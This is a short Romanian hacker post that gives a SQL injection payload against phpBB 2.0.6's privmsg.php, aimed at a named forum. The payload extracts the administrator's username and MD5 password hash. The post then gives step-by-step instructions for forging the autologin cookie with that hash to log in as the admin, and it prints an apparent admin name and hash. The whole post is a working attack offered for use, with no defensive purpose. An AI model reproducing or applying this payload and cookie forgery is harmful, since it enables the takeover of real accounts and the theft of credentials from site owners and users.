slashu

Site : www.cutare.ro http://www.cutare.ro/Forum/ Powered by phpBB 2.0.6 Exploit: privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_level=1 LIMIT 1/* Dupa Injection vom avea : Users : cutarescu / c7c9cfbb7ed7d1cebb7a4442dc30877f <--- ADMIN (vezi mai sus : WHERE user_level=1) se afla profilul din lista membrilor -> 2 Se creaza un cont nou: User: xxxx Pas: yyyy Se bifeaza optiunea "Remember Me" la logare.Se inchide Firefox fara a da logout !! Se ia cookie-ul din fisierul cookies.txt (C:Documents and Settings..Application DataMozillaFirefoxProfiles..) Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2296e79218965eb72c92a549dd5a330112%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%225899%22%3B%7D Dupa aplicarea metodei urldecode() (vezi pe gugal site-uri care decodeaza) vom avea: phpbb2mysql_data = a:2:{s:11:"autologinid";s:32:"a7c9cfbb7ed7d1cebada4442dc30877d";s:6:"userid";s:4:"5899";} s:4 se va inlocui cu s:1 5899=id-ul user-ului xxx se va inlocui cu 2 a7c9cfbb7ed7d1cebada4442dc30877d = parola MD5 Editam cookie-ul si inlocuim id-ul si hash-ul aflat prin injection: phpbb2mysql_data = a:2:{s:11:"autologinid";s:32:"c7c9cfbb7ed7d1cebb7a4442dc30877f";s:6:"userid";s:1:"2";} Dupa urlencode()(vezi pe gugal site-uri care encodeaza) vom avea: phpbb2mysql_data = a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22c7c9cfbb7ed7d1cebb7a4442dc30877f%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D Copiem noul cookie in fisierul cookie.txt,deschidem Firefox,intram pe site si ... LASER FRATE slashu